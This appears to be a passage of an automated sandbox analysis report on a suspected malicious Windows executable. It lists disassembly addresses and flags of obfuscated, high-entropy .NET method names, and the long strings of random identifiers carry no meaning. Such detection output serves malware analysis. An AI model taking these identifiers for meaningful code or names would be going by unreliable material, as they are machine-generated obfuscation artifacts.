                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 0_2_00007FF848D51EF7 push eax; iretw 0_2_00007FF848D51EFA
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 0_2_00007FF848D50A68 push eax; iretd 0_2_00007FF848D50A6B
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 0_2_00007FF848D52041 pushad ; iretw 0_2_00007FF848D52044
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 0_2_00007FF848FBE008 push ebx; iretd 0_2_00007FF848FBE07B
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 72_2_00007FF848BD627E pushfd ; ret 72_2_00007FF848BD6281
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 72_2_00007FF848BD263D push ds; iretd 72_2_00007FF848BD2641
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 72_2_00007FF848BD47B8 push edi; iretd 72_2_00007FF848BD47BE
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 72_2_00007FF848BD7B02 push edi; retn 5F4Eh72_2_00007FF848BD7B36
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 72_2_00007FF848BD00BD pushad ; iretd 72_2_00007FF848BD00C1
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 72_2_00007FF848BD47FC push ss; iretd 72_2_00007FF848BD47FF
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 74_2_00007FF848BFB724 push esp; iretd 74_2_00007FF848BFB72C
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 74_2_00007FF848BFC72A push eax; retf 74_2_00007FF848BFC72B
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 74_2_00007FF848BFB03A push esp; retf 74_2_00007FF848BFB03C
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 74_2_00007FF848BEBDBA push esp; retf 74_2_00007FF848BEBDBC
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 74_2_00007FF848BEA1E2 push eax; retf 74_2_00007FF848BEA1E3
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 74_2_00007FF848BE4EC5 pushad ; retf 74_2_00007FF848BE4EDA
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 74_2_00007FF848BE0678 push ebx; retf 74_2_00007FF848BE06AA
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 74_2_00007FF848BE0673 push ebx; retf 74_2_00007FF848BE06AA
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 74_2_00007FF848BE8738 push esp; iretd 74_2_00007FF848BE873B
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 74_2_00007FF848BE6086 push ebx; retf 74_2_00007FF848BE6087
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 74_2_00007FF848BD627E pushfd ; ret 74_2_00007FF848BD6281
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeCode function: 74_2_00007FF848BD263D push ds; iretd 74_2_00007FF848BD2641
                            Source: 9XHFe6y4Dj.exe, E42qTALRT3CrKwHxkeu.csHigh entropy of concatenated method names: 'Gh9L3Npu53', 'rchLSYxaa9', 'w5TLbAqETi', 'QvMLuAQASE', 'zFkLMT4aSM', 'a5tLvNQdO8', 'JnrLOylQla', 'wV4LeiNcbM', 'csxLw79Mku', 'ABFLiSw5uq'
                            Source: 9XHFe6y4Dj.exe, SN6yPbKonPQAxPKj7xV.csHigh entropy of concatenated method names: 'O3I', 'P9X', 'PWwYpPiYKb9', 'vmethod_0', 'imethod_0', 'Lbo2kEYcuR5h0Unl0KDK', 'aE9BNZYcMTjl6eAWSE3l', 'd9d2K5YcSgfUxJrMN1yB', 'CWXCAjYcb73XQ1IOjoFe', 'jDFTc8YcvVyMLNbNBuvo'
                            Source: 9XHFe6y4Dj.exe, xFe9EMKOOQiTj3Z8mhT.csHigh entropy of concatenated method names: 'aaxKna0kop', 'IkW7rPYcZGnPv7LnTbRj', 'KrdP7aYc38Y2dHptb9G5', 'aMSUUZYcdfyK9KVMN0Y3', 'yd96uRYccrOr6H5mfIRZ', 'yygKwNvK9W', 'fIbZfpYca1WUjq4Gf6SZ', 'MeyIKhYcIv7rxt5sYyvs', 'wWyoa3YcPZYQtWYJrDby', 'qxyqELYclJ0Mq1r1Qlpq'
                            Source: 9XHFe6y4Dj.exe, r7oH8fIJjTEUyIFWoEE.csHigh entropy of concatenated method names: 'mN3g1SOAJ6', 'IbvgY5pDOU', 'dBTgNyd1l2', 'wVUghpgefm', 'suegpSFW02', 'ts6goRTcnZ', 'u7NZ83YEzsH4my9RaGUi', 'eqrWUWY51O4x75KwOFKE', 'wYs5xcY5YpdxEb5NBAGF', 'bWXQwIY5NSU9qb2OFimT'
                            Source: 9XHFe6y4Dj.exe, god29xo6dR5nj8cCOCD.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'yXsYKoo5MNh', 'yWOYpYaoQ3v', 'JotrjWY3uUSNYlGVTNne', 'sK10vsY3M4WEGmSfcIly', 'BCjlWPY3vHmPsLaiqaDO', 'IGPO6eY3OsoEquvtUene'
                            Source: 9XHFe6y4Dj.exe, u7dBXQN3brPqCqCbWPH.csHigh entropy of concatenated method names: 'BqWNjNeolH', 'FqrNHNrQcf', 'pVvIgGYImE2h9PdLn7vb', 'itfmqNYIZCXgfN3fo9L5', 'OE6ph8YIccu9bLAHxu4d', 'CfaNESQuqU', 'Cc7ZSSYI2nvyggyL4kQ7', 'uTPOyyYIVtCHAdc4gPoV', 'G9OMZaYIrGoGVZwLvx2H', 'cdVNZIskEZ'
                            Source: 9XHFe6y4Dj.exe, PxYyBN7eGEjABOahheG.csHigh entropy of concatenated method names: 'aj8bWtY4vc1htgTGuM7T', 'NBwTXNY4OnlnhJp4gcKf', 'c9ZBFRr66Q', 'Ddi7JZY4n9rvPCjLu9wy', 'L12MRpY4QZeF1DXt8E0l', 'MDZ9WMY4AI2YbGyN1ZEw', 'F0G3ZfY4GdXaMGDqov3f', 'ojCluhY4LxF8kMjDGGGE', 'gws1SpY4qih9n0GVx2VD', 'yf1jMKY4PD9lFca9EM4B'
                            Source: 9XHFe6y4Dj.exe, rvfDrAQ97j24rpDnQl5.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'alsYKAH4h4Y', 'sHQYKGyQ3LC', 'w9lKDAYj4AeDm5Ypx1hw', 'DyR607YjJ1iR08CuqAH8', 'A0IXE6Yjz3qw1hZKQpL9', 'cHqYEnYH1NbaGDfDOO2S', 'P51GUgYHYKyWmdjtMa3Y', 'Y2QBV6YHNC2VNe20wFoJ'
                            Source: 9XHFe6y4Dj.exe, G7s2NToviyDPf0nJ1sY.csHigh entropy of concatenated method names: 'fXGoah1SVu', 'n9NoICq7Fl', 'hWPogaVAkF', 'teDe1vY3yfMIGa5MSWDF', 'D3utYeY3c2YQFMTnTiqj', 'l2rpf0Y3m6HvWuGy5IER', 'gNOekMY3VeiDAOfPJPuK', 'SVtoL75Jxg', 'NyZoqUfEEB', 'GverXoY33jOeVBMq9rcF'
                            Source: 9XHFe6y4Dj.exe, Tp9HXviIZuPjYbwnyt0.csHigh entropy of concatenated method names: 'Jx5iy4027x', 'TZYc6JYC62tVIZ33NqOA', 'LkSrnQYCRbnD0E8vKM6N', 'kPyi8OLFqP', 'zRNi3L1m0U', 'mvQid6faYo', 'DdZy5PYComfvEnS7dknK', 'chJgcgYCUhtQS4fh0BhO', 'O36C1XYChnembfVsrWNC', 'c2oXwgYCptc8kjHuyeWd'
                            Source: 9XHFe6y4Dj.exe, nN84mSnu8SlJk5IZWm4.csHigh entropy of concatenated method names: 'SQEnnUVs73', 'dDDr79YCJMu54vRiCnU0', 'gscKHPYCzpNPtKoMF53Z', 'ynBWXyYCBQfXlThXIXx5', 'V3Nbj3YC4VfsQmOVFqUp', 'htVSTvYj1vBRpEZVJ2Pw', 'rdKnvuAaoC', 'VlC2mGYCXjTA0ZrR86l5', 'kjlxtDYCDBW1Icd3f7sY', 'V9N4bCYCFWVdTfHdU0F2'
                            Source: 9XHFe6y4Dj.exe, aHTiITirUs4jHBKWRKH.csHigh entropy of concatenated method names: 'fRWik4iNaD', 'omDiEnyQra', 'RCSi598oSD', 'PPMO9gYCwJuCnPF2ryhu', 'A0qZssYCirvMI1EbZqPb', 'jl7v48YCOE4OL6TvU46b', 'KrR8lbYCeBv5l142dG8p', 'WwNiCHspTg', 'PRhijKHHB6', 'VTriHZ728T'
                            Source: 9XHFe6y4Dj.exe, qsxuwioWcHXvw2Gv0y2.csHigh entropy of concatenated method names: 'KWjoTypirC', 'C65wJHY3zcWN2IF56dYa', 'QPuwYeYd1BsflLW1OxVs', 'pKY7RQYdYo8PeQcQVZGr', 'TIGQk5YdNUiuRxkZAjLe', 'U1J', 'P9X', 'xx5YpvfXCUs', 'c9gYpOFubaw', 'KyQYK0jdnnm'
                            Source: 9XHFe6y4Dj.exe, OmLsSN27pHNuPb1DpD0.csHigh entropy of concatenated method names: 'g9J247Kyl3', 'JXm2JyvkSV', 'yRj2zHLbsO', 'KHcC19VVh0', 'k4VCYPdnri', 'BX5CN6CuWe', 'sucChHvfZy', 'zpfCpr2dZP', 'ibgCoGpZSu', 'SoeCUcnEdX'
                            Source: 9XHFe6y4Dj.exe, Go5CXXF3P58rZLMUQ9F.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'i59FZKus7k', 'Uorx4LYxktH4gx6TkMMM', 'fmao0gYxEo0AteA9ABOi', 'rBNqxcYx5lnsXBxZb17M', 'MlRLv8YxToNGajXUCnqy', 'UF8rcOYxfRcTcvjTB0Mq', 'P7cSY2YxXuI5Y4VxSNkP'
                            Source: 9XHFe6y4Dj.exe, fycwHRFVdFCYd9WY9V9.csHigh entropy of concatenated method names: 'f7PYKlj4anT', 'AYOYUPLqEUU', 'MOm1jqY7MP2CAfnq3F9Y', 'fR9ai7Y7bL5gmbOEWZXR', 'dWJNAfY7uwJeFjoAnWgE', 'L4Qca5Y7vtr95tJSrLVO', 'QA50FjY7iGxGGualRAAq', 'OBQwMZY7emTKCsimWnHm', 'lTteNHY7wnNmxdNWNejo', 'ReV4g0Y7nR8PnxPnLuog'
                            Source: 9XHFe6y4Dj.exe, g6S9h5r6ME9xa3lewgK.csHigh entropy of concatenated method names: 'HPJrqt2o8A', 'HmaHHCYFeeCfHI6e0Egp', 'CwSrwiYFwduyF98yfUbi', 'SUUKdeYFv50GpTmllcwF', 'kEqgYXYFOUkyIC39Zitf', 'IPy', 'method_0', 'method_1', 'method_2', 'vmethod_0'
                            Source: 9XHFe6y4Dj.exe, aFjCxPZm65Y6AACcjgV.csHigh entropy of concatenated method names: 'Close', 'qL6', 'OMVZVt0tgA', 'DOdZrWQNjt', 'n6AZ2AuweO', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                            Source: 9XHFe6y4Dj.exe, aCQsgE0yO6wjesAkuNe.csHigh entropy of concatenated method names: 'P9X', 'vmethod_0', 'olIYpL5uqmr', 'VXMYK9Ca3nV', 'imethod_0', 'jt2nbqYZ7j0QlXsSlooW', 'vvbpUWYZsk6TagfD1a9y', 'k985IIYZxvAHeiCc2m2X', 'FaY4VcYZBWH1IQdN6qa9', 'vWjvR4YZ4HLN0ACkqxIN'
                            Source: 9XHFe6y4Dj.exe, D0mDa371lrmYf14v8uC.csHigh entropy of concatenated method names: 'lDu7pxtCUs', 'Axy7ojJh3p', 't9ZKWYYB7Ll7K8OBUdEX', 'NkUZKXYBByytlCiwDkic', 'pfnMHuYBsS4bBvXFRW3K', 'cMm3D7YBxAs3TJvng0p6', 'FaSCP9YB4tLx2Gq3pA24', 'CQfBxPYBJXW6Bd0k3UP5', 'Y6h7NV9r7r', 'GEwXOIYBXmm8n1O8Zc4q'
                            Source: 9XHFe6y4Dj.exe, Pf8vfpWERF2fGVqGx5.csHigh entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'yhekdVkxO'
                            Source: 9XHFe6y4Dj.exe, oCw2mep22ZmBjkD1ltI.csHigh entropy of concatenated method names: 'mYbp4WxB9N', 'L2X3RkY3N3e6AxwG3OdL', 'XQxr5XY3hdBGowG23oOR', 'U5eZBRY31RZNl0UPumjk', 'xov9sdY3YJPH6a7WW5KE', 'eu0VgAY30yNiq9cn6GtF', 'jFc7LwY3oge4hprAJU7l', 'MsohHrY3U9qm4psPQbYj', 'kIkLvEY3K9fUJ5yJMKQe', 'iKVoUwBLn5'
                            Source: 9XHFe6y4Dj.exe, BRkn8Cpi5FF0Zw5DJl7.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'L3I', 'k4cYKNqc7CT', 'yWOYpYaoQ3v', 'X4d5VHY8vDJlQ5SUptV9', 'L3NSqjY8OuGyn4CfA3Fd', 'NPtMwSY8ejfFFYlejXnl', 'E1ZKIBY8w5O6K6fQXKEN', 'dKmYcxY8iTAJXGyDBeFv'
                            Source: 9XHFe6y4Dj.exe, INL3n1IkvOvEABhhH7o.csHigh entropy of concatenated method names: 'nm1I5IivQX', 'uAwITmSmwI', 'GLKIfbLJDd', 'Wc0OG0YEkeN13EZ6qjG9', 'WvKlXCYEWKEbfV8siLFl', 't6mFpfYEtpHEN8NJv81Y', 'DFAdyyYEEDjIaeADx2hg', 'LNXl0AYE5RJgEK6GhXN6', 'ay197JYETxokZjfwBsKI', 'bsmpNXYEfltaE3TuPGP7'
                            Source: 9XHFe6y4Dj.exe, HIOEoTPFMZ1brXvQMXI.csHigh entropy of concatenated method names: 'I4IPxTTM4N', 'VFQP7k64rj', 'bPdPB8J6vc', 'IE6haEYkuHvyOTg523HT', 'tdGvTUYkS44KbqVLLahx', 'lVO2C5YkbrcEClqiVZZ7', 'oJVq77YkMpsmES1nDe8f', 'lAZojjYkvugwYsoCg6NQ', 'kDUZS8YkOHqeIHXA0jiR'
                            Source: 9XHFe6y4Dj.exe, xQJheCxClVORpvgBAIv.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'yirxHfUThC', 'PpRxWnRgny', 'p4dxtnoVdD', 'Dispose', 'IECc8KYBcsSwX3sp39TM', 'iK0QnMYBmqEO5QR3B8PW', 'ErNZKxYByLYERmnatAJe', 'LoZ7PfYBVX7xgOTtvgds'
                            Source: 9XHFe6y4Dj.exe, J950ChNf9SdsZMpS4Kh.csHigh entropy of concatenated method names: 'A2Wh0ie7ym', 'BNKjLRYIxqVJBq2LHorJ', 'fpRnQoYI7j3tJyxlK4bO', 'zcHRMSYIBScR91DsQvXy', 'MOwNJTYIF9JYO9o8TMYd', 'Lw68f8YIs9u8m23PR0SN', 'qEkyGOYI4XX0wH7IiPHU', 'JvRQfcYIJupXcdSnChZx', 'dm6h1crwM6', 'FhThNW4Whb'
                            Source: 9XHFe6y4Dj.exe, OnteC7pdB2BTfLBhZFS.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'Qa8YKpP6lFP', 'yWOYpYaoQ3v', 'HSKVSMY88PJnuZlrMpyJ', 'CyIfwBY83MbVpAbUYBww', 'HwXsJHY8dht9yTpO9P0r', 'MR0eD6Y8ZiGUSqHXgoR9', 'uyHj72Y8cVE2YAuaDUi0'
                            Source: 9XHFe6y4Dj.exe, vKHRqgYJHueweMMvgFw.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'SXWYKYO6geO', 'yWOYpYaoQ3v', 'GwiKCWYaBiFqCZtpB40W', 'EypH9EYa4vQGMwqhIKTD', 'syIRB2YaJanVKd4ioF2y', 'mVIJCJYazj94JN8unu4N'
                            Source: 9XHFe6y4Dj.exe, BerlY0gCGL47gS9OTdV.csHigh entropy of concatenated method names: 'wBDgHUiPcB', 'OJ6gW5dNhT', 'F9dgtjThcZ', 'D6JgkQloLG', 'tG5gEua6rY', 'eSIg5ilaAb', 'iomgTx5Uvx', 'FBwgfofZdX', 'Tk0gXLwRaf', 'ExcgDUI7ii'
                            Source: 9XHFe6y4Dj.exe, eNgjHCKkiCF6B5xtrEj.csHigh entropy of concatenated method names: 'rRVKxbn7l4', 'uOqoJuYmReeNJ7OFYLuf', 'k99yGCYmKCQSvXZ20Njg', 'gdRSDnYm6C1lAZxA44Af', 'Vo13upYm9FYWjV9QkKDx', 'fmiiNgYmSn7AHGV5VakA', 'P9X', 'vmethod_0', 'Hu9Ypa1YWJr', 'imethod_0'
                            Source: 9XHFe6y4Dj.exe, VftcS2cfKYbroBgTC6l.csHigh entropy of concatenated method names: 'aRmLRFYD6mU5SZM5rUCm', 'GmxL6IYDR8WB1PJ2cJQh', 'SC3cDm9hHK', 'Mh9', 'method_0', 'dkVcFvqiBy', 'ouQcs5ZWgn', 'N8icxfJET9', 'kVTc7tP2uS', 'pQxcB52Jcq'
                            Source: 9XHFe6y4Dj.exe, QkDB7cAbwwIbaq9T6PX.csHigh entropy of concatenated method names: 'OAnLYsfgBK', 'pnJ0wBYW8U3ekuNtIEqO', 'PYIHXfYW3VjJbmkNPJlc', 'mQfL2eYWdGJLVeRPCvow', 'yWOAMG1tKP', 'D6sAvSjx6M', 'CpYAOk6bKQ', 'KxNAeHcyKk', 'LN9Aw56vPw', 'jiBAip5i8d'
                            Source: 9XHFe6y4Dj.exe, qMNoDl6NFae3Rwlae8v.csHigh entropy of concatenated method names: 'bCK6psfeIl', 'LAc6ohQCUy', 'vCb6UaFGNK', 'Nyc60jR6Na', 'zdu6KE0Y4e', 'pJe66HYWSo', 'WqL6RR8iGD', 'mue69H2GBO', 'Qpa6S4jMFk', 'gCt6btqqdr'
                            Source: 9XHFe6y4Dj.exe, FQRe3axbxOh9Mrh1b5N.csHigh entropy of concatenated method names: 'xtnxvJmUUA', 'asdxioKlFd', 'v0HxA3FZRG', 'vmLxGcQbvN', 'tqjxL4tUKI', 'kfDxq4Jt6T', 'BoOxPDwu3y', 'a3CxloUlY7', 'Dispose', 'yrWhesYBeip3n9MkmjAP'
                            Source: 9XHFe6y4Dj.exe, pEbIjOPLgMLK7ma3888.csHigh entropy of concatenated method names: 'zaAPPlenyv', 'OxXPl5ZJQB', 'lq0PaoADFY', 'JwmPInTZHV', 'modPgUJgZa', 'sXjNo2Yt4XEHBcKypaxv', 'tw0cBhYtJ5oBm1dcfR5O', 'XFjFJgYtzxvT2AyNLuN2', 'MJjxCcYk1kQ0G5iW7PFe', 'tP8aC7YkYlTeaJKmtLe5'
                            Source: 9XHFe6y4Dj.exe, Us5gVv8JRu44Ob5Rd8L.csHigh entropy of concatenated method names: 'yXE31TwDRC', 'B7I3YPWNp6', 'Yd7', 'UO43N18br7', 'CmQ3hPrF1T', 'tFr3pK6DWj', 'nwJ3ogAZgt', 'SjhQBfYTzGAdRSrPXfA1', 'qfvAKqYT4lxep4XRp0QH', 'vtxtZTYTJ5heMdO8eL48'
                            Source: 9XHFe6y4Dj.exe, f7NxsaNnVjkTKCTTGX8.csHigh entropy of concatenated method names: 'lGiNA0kJLs', 'kJgNGpumsI', 'hUcZ0vYIGcuH34aG081K', 'XtnBXVYIQnW3HGcHt5HC', 'AgBCHOYIALkwwN3yBPw2', 'NT9yX7YILQ2OSxAnVEML', 'gVZDSoYIq68JR3nxBhS5', 'pT75c6YIPRVa84US1r9D', 'cUiM4EYIlLg30QUrHj15'
                            Source: 9XHFe6y4Dj.exe, F5gxo2LXqPPwjRq1RCB.csHigh entropy of concatenated method names: 'fAGLFya3i5', 'LlWLsQjbcF', 'YMeLxi3eNk', 'B3tL7xqd87', 'NlkLBJrFJj', 'fVR8QLYWJ0EhugkxaiQA', 'Nn6MaCYWBL4BDhljlfkk', 'Hh4u44YW4qo8kbDp406o', 'FXURkZYWzA0gsiVEGwc3', 'ciRlG4Yt1GrVXKL58sbn'
                            Source: 9XHFe6y4Dj.exe, U0FhyT0j89W2mgFnT48.csHigh entropy of concatenated method names: 'Ir60xUC41y', 'LXj07htKj0', 'dxLvAnYc0DrOsrOt7irt', 'Fdqt7aYcoTwdKOM9WBF8', 'vpUdHOYcU4IKqJfK9VdM', 'fI30WSiIR7', 'Omy0tELDbW', 'B3O0kdngvQ', 'Tc70EjyuwI', 'S3005AASuB'
                            Source: 9XHFe6y4Dj.exe, JKxWDbhlfu7pVx8ZZK9.csHigh entropy of concatenated method names: 'mqyhHUlihg', 'mGLhWWoi8X', 'GIchtZQDDf', 'jEnV6JYgrfqvuZRZVEan', 'I5Hp4DYg25JvnPnGUDkE', 'XWw4k8YgyHVcK6ICJoVD', 'OuL2PLYgVVtuLMSqOw2V', 'EBJhIyiVTY', 'oyMhgnp5HY', 'ShDh8syxdH'
                            Source: 9XHFe6y4Dj.exe, o02FnsQY07J2MbxjN1l.csHigh entropy of concatenated method names: 'rC9', 'method_0', 'hN8YKiyBqpU', 'QK9YKnM93Ey', 'rZmPumYjWplUX4FOciUa', 'gHGcj8YjtjihBsS8rpT7', 'FF1LKTYjkpcc3UICbabe', 'KyiWS6YjEipU7mtxoRnd', 'TDrfZhYj5ZsFHHNji5GE', 'zN2rCqYjTvmnN9IBuHrR'
                            Source: 9XHFe6y4Dj.exe, XsNrJu0iRjKJLwircBa.csHigh entropy of concatenated method names: 'nBE0I7sUw7', 'UAe6VnYZjt7C0nCfHoMl', 'o27STDYZ2IXFGUKi5BZf', 'cTT4DqYZCniuVQbMSysu', 'rYkMEkYZHDeU6oKVbAEK', 'cQs3veYZWylS5nmNLJLY', 'miv0Qk3iV9', 'mQv0AlHmJl', 'h6b0GhTgJ0', 'kZT0L6K27a'
                            Source: 9XHFe6y4Dj.exe, rSpDJN8tiKMPRm9Sa4U.csHigh entropy of concatenated method names: 'VpN8EIVt6U', 'sS385Usuhx', 'kpn8TrysUs', 'hOJ8fYVbXZ', 'at18XHFulZ', 'W7JTTNYT5QZ9G0Vv96Jo', 'IF8cv7YTTkG0OsNCyq30', 'fhdtOxYTk4k2jnZ2y6s5', 'J70VreYTE03T6n5JkgLb', 'YHBDYFYTfZsaRj2H4j3g'
                            Source: 9XHFe6y4Dj.exe, SBifFIMGBZJDE60hPAM.csHigh entropy of concatenated method names: 'I4diba0bMA', 'nE8iuHSdqy', 'MBIKEEY2fxFS7ROO7dFL', 'Mpv4UNY25lrnlraj5RiB', 'BQkeCUY2TO8g1HGD7cxt', 'vPWP5HY2XMd32bI5sASh', 'pjEUAUY2DLXZmguK8Oeg', 'kDViiFDH2J', 'YWWJ38Y2sBegsyO10QY5', 'XCKnMRY2xK7WmWUr1e06'
                            Source: 9XHFe6y4Dj.exe, JcTtsiKC4LIsaY9EbxG.csHigh entropy of concatenated method names: 'P9X', 'lrtYKSfi6DF', 'imethod_0', 'gNOKHtaNfw', 'HeKJJCYcJBxOfUH43ira', 'Bv4g3HYcz9uuYQiRHgv9', 'y9av0yYm1JCkBOASbISF', 'CqWunvYmYEvddl4cql8o', 'Lnb7CPYmNgVAWuKTLDD6'
                            Source: 9XHFe6y4Dj.exe, W7MyLLl3o2K1seX8Uqm.csHigh entropy of concatenated method names: 'method_0', 'pNhlZlEYfh', 'fjMlcrvau5', 'xo8lmJF7Uj', 'ShIlyOTeee', 'loklVGkBYd', 'znplrQDm8w', 'oSVZnpYk8lCA33icQ1o7', 'DPySxWYkIZqlWw85G9QE', 'kV3kcAYkghpZOZxHMVfV'
                            Source: 9XHFe6y4Dj.exe, f3fkGIocKGDerRIZn1t.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'VDFYp9ldjf5', 'eXKoyBnhIC', 'imethod_0', 'dNsk29Y32Ggivh5BPlwu', 'PIjvv3Y3CoVuctsuZ9Se', 'zSlfKbY3jv2OIIZjZwTT', 'to8nXhY3HhmDUuK9UPuQ'
                            Source: 9XHFe6y4Dj.exe, pehnlj06QiHSkPRxfpT.csHigh entropy of concatenated method names: 'M8509O6Mhn', 'Gbl0S8iwtw', 'LIQTRdYZvVTWcp0EXEPN', 'x2DcxUYZuS3TnVdwCy5L', 'fdMbZMYZMOhKLvTCaajH', 'QpspT4YZOMLrfrablVAi', 'ylkZJgYZeHJbyUXRJVkM', 'u49tn3YZwMjVHU08Yvre', 'Ujv4mtYZib8JChDcFOYF', 'Prkr5jYZnstjFkFJOHju'
                            Source: 9XHFe6y4Dj.exe, h15SPJ4uyJthUNbUclf.csHigh entropy of concatenated method names: 'PycNoTjvZ4m', 'lyxNofP1dpZ', 'hB09dRY4WgxP1Dmp7mBe', 'YrhEZyY4tcXffqC8ONHO', 't2MTc2Y4kVxdnFyMl4OS', 'L0kSV3Y4EQIU3qwpBySP', 'WIAWffY45OKJIBJO6Y0k'
                            Source: 9XHFe6y4Dj.exe, EtktcJpP1naIMJxotas.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'mxkYKhmLPaE', 'yWOYpYaoQ3v', 'Pb43m2Y8AtHy6MIYe2Ca', 'Gv7rlsY8GOso3YIdcbcA', 'aRi6ThY8L9gd4PqZvCMa'
                            Source: 9XHFe6y4Dj.exe, u3Mty4YFL93hAyqdc4J.csHigh entropy of concatenated method names: 'P9X', 'KJwYx0lEZr', 'h9vYK1OIvxZ', 'imethod_0', 'TnFY71ud88', 'FaFRoTYaDRkMtGrewRTA', 'GscZcyYafORqTI9iGOpy', 'Vr97G6YaX74oWJWV98UM', 'kHSPCFYaFxhlmpykIgqI', 'jhnQWaYasICuZ3LrWcuT'
                            Source: 9XHFe6y4Dj.exe, TyQUjMUq2bbg2TvwOt6.csHigh entropy of concatenated method names: 'xCUU3cE20K', 'eAYWpmYdrLAANcw0P1qQ', 'phBXZbYdyfxm0UvbqfBu', 'hPx6ioYdVvBAtuyuKBDv', 'eIiRxvYd2eyxAd5GB85o', 'E94', 'P9X', 'vmethod_0', 'XJvYpnAl5N9', 'cCgYK68BFNO'
                            Source: 9XHFe6y4Dj.exe, Kd9LjY23PlS1BUGOkHd.csHigh entropy of concatenated method names: 'WyD2ZWEwAJ', 'CCQ2ciIbwt', 'BIM2msuFen', 'bId2yc3jYR', 'RWc2VU0AOP', 'o3k2rgRtiO', 'qXh223WOMw', 'H0P2Cog0Wa', 'YB42jPKaGM', 'iqe2HVgtUI'
                            Source: 9XHFe6y4Dj.exe, cqS41bUjwbffCkhLqtt.csHigh entropy of concatenated method names: 'jKkUxoXigY', 'cF7U7Mludu', 'bTvUB0wqHy', 'vkWSnDYZYZneMt4m7Zc8', 'pXsjI0YdzSke1kjrHShZ', 'p5WvA0YZ1IGaKwJUpVfr', 'WfBV1HYZNoBl9keAh3pf', 'A5pUWY7KXg', 'tidUt61hhJ', 'RqTUkB8pA9'
                            Source: 9XHFe6y4Dj.exe, qimCAReovyjdTuVBos.csHigh entropy of concatenated method names: 'ObHcfLOML', 'vYOwoaYl846keBTl3auE', 'EdrpSiYlI7IR8dPAanbB', 'FouYCoYlgTqwfZ9uqwMp', 'l7yiK3cG1', 'i54nblhKa', 'nDsQNREXH', 'MeuAnYNuX', 'muVGLXKYo', 'SygLAVmVn'
                            Source: 9XHFe6y4Dj.exe, i6VjSO0Yf01V1sxi832.csHigh entropy of concatenated method names: 'Mhx0hcR2Q1', 'N8x0pDWFmx', 'Ph10ogMP7N', 'gfPlHkYZULJT1da4FqUr', 'o8rCYKYZpesu1JvDEEJD', 'AUKLDkYZo5GDXw5VKPdB', 'ocUCJLYZ0aFiLG3MdiWP', 'Ap7lERYZKRjhYQJIgpkP', 'OhAQr2YZ69PpKuoaM1G4', 'yIKQSpYZRC7sZxqbZfdW'
                            Source: 9XHFe6y4Dj.exe, VqVjXqrtJyFVxWV4N0Q.csHigh entropy of concatenated method names: 'YQIYKqgoiE5', 'vaprExpxKT', 'bVIr5F8wTA', 'xxRrTv0QgO', 'MbQpV7YFahVdkG65Zu0c', 'F3iyJwYFIkmGlQ7OpIjF', 'COGSwoYFgwwgqtfjkBCs', 'UPkUyVYF8ahOJ3stoAVu', 'wBrVjxYF3clyDPc5AQy6', 'HWRqSTYFdk3YQrgNJgEW'
                            Source: 9XHFe6y4Dj.exe, yFmIOVzxcX5O3cFxwK.csHigh entropy of concatenated method names: 'kHJYYcvWlD', 'swZYhQcINZ', 'k6qYpFHbOw', 'nicYo3wj3q', 'wjYYUVFZHK', 'JQJY07qvJW', 'O5HY6sUOiK', 'EEehR1YaUoJJNXjSxvvm', 'cRZBu1Ya0EZex2dnxs5U', 'HSnTtHYaKr09gCuIaXB5'
                            Source: 9XHFe6y4Dj.exe, F4sIB5hf1s6XR7x1XyR.csHigh entropy of concatenated method names: 'cJtph8fO9h', 'T6fpp3E6Xb', 'lLlpoZUq1y', 'DNn210Y8YCR9U6Iu0hqt', 'hsUAPKY8NOT4vaq5KKlX', 'vWW1yxYgzOOMMcJJL0Qa', 'RUrl3gY8178THf7PeAat', 'YMop9BwYwh', 'KgYgmmY8pBy2nE65GBgt', 'b4wKH5Y8oH4IVXtUUwjs'
                            Source: 9XHFe6y4Dj.exe, FG3G5ox3OK3mZk2lqe2.csHigh entropy of concatenated method names: 'nCfxZZuyc0', 'FvdxcUQsSM', 'hjXxmBLyuI', 'ORmxy1idPT', 'Dispose', 'xVmfGGYBlHJ9dDtZhlim', 'DwCZPFYBqTAYGTEqpjNF', 'Ajh07tYBP9qlMU2poOYr', 'qSiSoCYBaWCbiLJH62SO', 'cxuETSYBIU5oyxwq07BQ'
